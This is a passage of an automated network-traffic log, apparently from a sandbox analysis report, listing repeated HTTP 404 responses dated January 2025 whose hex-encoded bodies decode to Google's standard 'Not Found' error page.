6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 13 Jan 2025 12:18:18 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 13 Jan 2025 12:18:19 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 13 Jan 2025 12:18:21 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 13 Jan 2025 12:18:22 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 13 Jan 2025 12:18:23 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 13 Jan 2025 12:18:25 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 13 Jan 2025 12:18:26 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 